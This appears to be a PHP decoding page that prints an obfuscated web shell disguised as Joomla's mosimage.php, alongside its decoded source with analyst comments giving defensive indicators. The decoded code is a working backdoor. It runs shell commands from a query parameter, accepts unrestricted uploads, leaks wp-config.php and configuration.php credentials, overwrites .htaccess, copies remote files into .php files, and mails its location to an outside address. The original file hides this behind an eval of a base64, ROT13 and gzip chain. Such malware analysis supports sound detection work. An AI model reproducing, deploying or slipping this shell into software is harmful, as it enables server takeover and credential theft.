
PHP Decode

<?php /** * @version $Id: mosimage.php 21069 2011-04-03 22:58:48Z dextercowley $ ..

Decoded Output download

// NOTE(analysis): this listing is the payload that the eval() wrapper in the original
// file executes; nothing in it checks who is making the request.
//
// Handler for ?patch: rewrites the .htaccess in the script's working directory.
// fopen() with "w+" truncates an existing file, so any previous rules are lost.
// The generated rules first deny requests for files with the listed extensions and then
// add allow-all stanzas for seven exact file names: 1x.php.j, .inc.php.j, .incz.php.j,
// 2x.php.j, gelo.php.j, string.php and .libs.php ("string" is also the default output
// name of the ?clone handler in this file).
// Defensive use: an .htaccess containing these <Files> stanzas, or files with these
// names next to it, is a strong indicator of this kit; compare .htaccess files against
// a known-good copy and keep web directories non-writable for the PHP user.
if(isset($_GET['patch'])) {
	// Relative path: resolved against the current working directory of the request.
	$myfile = fopen(".htaccess", "w+") or die("Unable to open file!");
	// Deny rule: regex match on file extension, including case variants of "php".
	$txt  = '<Files ~ "\.(zip|rar|php|php3|php5|php4|phtml|gif|png|phpgif|pHp|PHP|PhP|PHp|pHP|j|J|asp)$">';
	$txt .= "
deny from all
";
	$txt .= "</Files>
";
	// From here on: one allow-all stanza per exempted file name.
	$txt .= "<Files 1x.php.j>
";
	$txt .= "Order Allow,Deny
";
	$txt .= "Allow from all
";
	$txt .= "</Files>
";
	$txt .= "<Files .inc.php.j>
";
	$txt .= "Order Allow,Deny
";
	$txt .= "Allow from all
";
	$txt .= "</Files>
";
	$txt .= "<Files .incz.php.j>
";
	$txt .= "Order Allow,Deny
";
	$txt .= "Allow from all
";
	$txt .= "</Files>
";
	$txt .= "<Files 2x.php.j>
";
	$txt .= "Order Allow,Deny
";
	$txt .= "Allow from all
";
	$txt .= "</Files>
";
	$txt .= "<Files gelo.php.j>
";
	$txt .= "Order Allow,Deny
";
	$txt .= "Allow from all
";
	$txt .= "</Files>
";
	$txt .= "<Files string.php>
";
	$txt .= "Order Allow,Deny
";
	$txt .= "Allow from all
";
	$txt .= "</Files>
";
	$txt .= "<Files .libs.php>
";
	$txt .= "Order Allow,Deny
";
	$txt .= "Allow from all
";
	$txt .= "</Files>";
	
	fwrite($myfile, $txt);
	fclose($myfile);
	// Stops here, so a ?patch request produces an empty response body.
	exit;
}

// NOTE(analysis): handler for ?clone. It copies content from a caller-chosen source into
// a new .php file on the server. Every input comes from the query string, unvalidated:
//   source - handed straight to fopen() for reading (whether remote URLs are accepted
//            depends on the server's allow_url_fopen setting)
//   name   - output file name without extension, default 'string'
//   type   - "wp" selects wp-admin/ candidate directories, anything else images/
//   path   - optional; replaces the candidate directories entirely
// Defensive use: look for unexpected .php files in wp-admin/ and images/ directories
// (default name string.php), and for requests carrying clone= and source= parameters in
// the access log. Non-writable web directories make this handler fail.
if(isset($_GET['clone'])) {
	// $req flags that a target directory was chosen; $loc holds that directory.
	$req = 0;
	$loc = '';
	
	$source = (isset($_GET['source'])) ? $_GET['source'] : '';
	$file   = (isset($_GET['name'])) ? $_GET['name'] : 'string';
	
	// 'type' is read without isset(), so a request that omits it raises a PHP notice.
	if($_GET['type'] == "wp") {
		$path  = "../../../../../../wp-admin/";
		$path2 = "../../../../../wp-admin/";
		$path3 = "../../../../../../../wp-admin/";
	} else {
		$path  = "../../../images/";
		$path2  = "../../../../images/";
		$path3 = "../../../../../images/";
	}
	
	// An explicit 'path' wins; otherwise the first candidate that is a directory is used.
	if(isset($_GET['path'])) {
		$req = 1;
		$loc = $_GET['path'];
	} else {
		if(is_dir($path)) {
			$req = 1;
			$loc = $path;	
		} else {
			if(is_dir($path2)) {
				$req = 1;
				$loc = $path2;	
			} else {
				if(is_dir($path3)) {
					$req = 1;
					$loc = $path3;	
				}
			}
		}
	}
	
	if($req && !empty($loc)) {
		// $file is reused: it held the name and now holds the output handle.
		$file = fopen($loc.$file.".php","w+"); 
		$stream = fopen ($source, "r"); 
		// $shell is never initialised before the first .=, which raises a notice;
		// fopen() failures are not checked either, so errors surface only as PHP warnings.
		while(!feof($stream)) {  
			$shell .=fgets($stream); 
		} 
		fwrite($file, $shell); 
		fclose($file);
	}
	exit;
	
}

// NOTE(analysis): handler for ?j. It looks for a file named configuration.php (the name
// Joomla uses for its site configuration) from seven directory levels up down to the
// current directory, and echoes the first non-empty hit to the requester unchanged.
// Defensive use: if this file was reachable on a host, treat every secret stored in
// that configuration file as disclosed and rotate it. Each failed file_get_contents()
// emits a PHP warning, so bursts of "failed to open stream" warnings for
// ../configuration.php paths in the error log are a useful trace.
if(isset($_GET['j'])){
	// Candidate prefixes, deepest parent first.
	$p1 = "../../../../../../../";
	$p2 = "../../../../../../";
	$p3 = "../../../../../";
	$p4 = "../../../../";
	$p5 = "../../../";
	$p6 = "../../";
	$p7 = "../";
	// Each level is tried only when the previous read returned false or an empty string.
	$j = file_get_contents($p1."configuration.php");
	if(!$j) {$j = file_get_contents($p2."configuration.php");
		if(!$j) {$j = file_get_contents($p3."configuration.php");
			if(!$j) {$j = file_get_contents($p4."configuration.php");
				if(!$j) {$j = file_get_contents($p5."configuration.php");
					if(!$j) {$j = file_get_contents($p6."configuration.php");
						if(!$j) {$j = file_get_contents($p7."configuration.php");
							if(!$j) {$j = file_get_contents("configuration.php");
							}
						}
					}
				}
			}
		}
	}
	// Raw file content goes into the HTTP response; nothing is escaped or filtered.
	echo $j;
	exit;
} 

// NOTE(analysis): handler for ?w. Same search as the ?j handler, but for wp-config.php
// (the WordPress configuration file): seven parent levels down to the current
// directory, first non-empty hit echoed to the requester unchanged.
// Defensive use: if this file was reachable on a host, treat the database credentials
// and the keys and salts in wp-config.php as disclosed and rotate them. Failed reads
// emit PHP warnings that can be found in the error log.
if(isset($_GET['w'])){
	// Candidate prefixes, deepest parent first.
	$p1 = "../../../../../../../";
	$p2 = "../../../../../../";
	$p3 = "../../../../../";
	$p4 = "../../../../";
	$p5 = "../../../";
	$p6 = "../../";
	$p7 = "../";
	// Each level is tried only when the previous read returned false or an empty string.
	$w = file_get_contents($p1."wp-config.php");
	if(!$w) {$w = file_get_contents($p2."wp-config.php");
		if(!$w) {$w = file_get_contents($p3."wp-config.php");
			if(!$w) {$w = file_get_contents($p4."wp-config.php");
				if(!$w) {$w = file_get_contents($p5."wp-config.php");
					if(!$w) {$w = file_get_contents($p6."wp-config.php");
						if(!$w) {$w = file_get_contents($p7."wp-config.php");
							if(!$w) {$w = file_get_contents("wp-config.php");
							}
						}
					}
				}
			}
		}
	}
	// Raw file content goes into the HTTP response; nothing is escaped or filtered.
	echo $w;
	exit;
} 

// NOTE(analysis): handler for ?s. It mails the location of this file to a hard-coded
// recipient (the address is shown redacted on this page). The message carries the Host
// header, the request URI, the server address and the address of the requesting client.
// Unlike the handlers above there is no exit, so the page below is still rendered.
// Defensive use: outbound mail from the web server whose subject starts with
// "kiriman bos" is an indicator; mail logs show when the file was first announced.
if(isset($_GET['s'])) {
	// HTTP_HOST is client-supplied, so the reported host is whatever the request claimed.
	$host = $_SERVER["HTTP_HOST"]; 
	$uri  = $_SERVER["REQUEST_URI"];
	// gethostbyname() returns an IPv4 address string unchanged, so these stay addresses.
	$serv = gethostbyname($_SERVER['SERVER_ADDR']);
	$addr = gethostbyname($_SERVER['REMOTE_ADDR']); 
	mail("[email protected]", "kiriman bos $host.$uri", "Url: $host.$uri 
Ip :$serv
 Ip injector: $addr");
}

// NOTE(analysis): banner and upload form, printed on every request that was not ended by
// one of the exit calls above. No login, token or address check precedes it.
// Defensive use: the title "UnKnown - Simple Shell" and the inline style string are
// stable markers to search for in files on disk and in captured HTTP responses.

// safe_mode was removed in PHP 5.4; on later versions ini_get() returns false for it
// and the page reports "SAFE_MODE : OFF". The @ hides any error from the lookup.
$safe   = @ini_get('safe_mode');
$secure = (!$safe) ? "SAFE_MODE : OFF" : "SAFE_MODE : ON";
echo "<body style='background:#000;color:#64D300;font-size:14px;'>";
echo "<title>UnKnown - Simple Shell</title><br>";
echo "<b>".$secure."</b><br>";
// get_current_user() names the owner of this script file; the same name is printed
// after both the uid and the gid.
$cur_user = "(".get_current_user().")";
echo "<b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
// php_uname() discloses operating system, host name and kernel details to the visitor.
echo "<b>Uname : ".php_uname()."</b><br>";
// Multipart form posting back to this same URL; the hidden "submit" field is what the
// upload handler checks for.
echo "<form enctype=multipart/form-data action method=POST><b>Upload File</b><br><input type=hidden name=submit><input type=file name=userfile size=28><br><b>New name: </b><input type=text size=15 name=newname class=ta><input type=submit class=bt value=Upload></form>";

// NOTE(analysis): upload handler for the form above. The uploaded file is moved into the
// script's working directory under a caller-chosen name, with no check on type, size or
// name, so files created here can be of any kind.
// Defensive use: list files in this directory that are newer than the shell itself, and
// make the directory non-writable for the PHP user.
if (isset($_POST['submit'])) {
	$uploaddir = pwd();
    // The "newname" field wins; an empty value falls back to the client's file name.
    if (!$name = $_POST['newname']) { $name = $_FILES['userfile']['name'];};
    move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name);
    // Second call on the same temp file: after a successful first move it returns
    // false, and the ternary prints "Success" on false, so the message is no reliable
    // record of what happened; check the file system instead.
    echo (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name)) ? "!!Upload Failed" :  "Success Upload to " . $uploaddir . $name; 
}

/**
 * Returns the current working directory with a trailing separator appended.
 *
 * Used by the upload handler to build the destination path. Returns null
 * implicitly when neither branch matches (for example when the last "/" is at
 * offset 0, which the first condition treats as false).
 *
 * @return string|null
 */
function pwd() {
	$cwd = getcwd();
    // Position of the last "/" in the path; 0 and false both skip this branch.
    if ($u = strrpos($cwd, '/')) {
		return ($u != strlen($cwd) - 1) ? $cwd . '/' : $cwd;
        
    // In single quotes '\/' is the two characters backslash + slash, so this branch
    // looks for that literal pair, not for a lone backslash.
    } elseif($u = strrpos($cwd, '\/')) {
		if($u != strlen($cwd) -1){
			return $cwd.'\/';
		} else{
			return $cwd;
		}
	}
}
// NOTE(analysis): command execution. The value of the "x" query parameter is passed to
// shell_exec() as-is and the output is printed inside <pre> without escaping; when "x"
// is absent a directory listing is shown instead. Commands run with the privileges of
// the PHP process.
// Defensive use: requests to this path carrying an x= parameter appear in the access
// log and give a timeline of what was run; listing shell_exec in disable_functions
// removes this capability on hosts that do not need it.
echo (isset($_GET['x'])) ? "<pre>" . shell_exec($_GET['x']) . "</pre>" : "<pre>" . shell_exec('ls -la') . "</pre>";


Original Code

<?php

/**
 * @version     $Id: mosimage.php 21069 2011-04-03 22:58:48Z dextercowley $
 * @package     Joomla
 * @copyright   Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
 * @license     GNU/GPL, see LICENSE.php
 * Joomla! is free software. This version may have been modified pursuant
 * to the GNU General Public License, and as distributed it includes or
 * is derivative of works licensed under the GNU General Public License or
 * other free or open source software licenses.
 * See COPYRIGHT.php for copyright notices and details.
 */




// NOTE(analysis): the docblock above presents this file as Joomla's mosimage.php, but
// the only executable statement is this one: a string literal is base64-decoded,
// ROT13-transformed, inflated and then passed to eval(). The page's "Decoded Output"
// section shows what that chain yields.
// Defensive use: eval() wrapped around gzinflate/str_rot13/base64_decode of a long
// literal is a common obfuscation pattern worth searching for across a web root, and
// a familiar vendor header is no evidence of origin. Compare the file against the
// vendor's release or a known-good backup. Decode such samples only in an isolated
// analysis environment, replacing eval() with output of the decoded text.
eval(gzinflate(str_rot13(base64_decode('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'))));





?>

Function Calls

gzinflate 1
str_rot13 1
base64_decode 1

Variables

None

Stats

MD5 6694f8d78eefa1a15507a00881c25a92
Eval Count 1
Decode Time 150 ms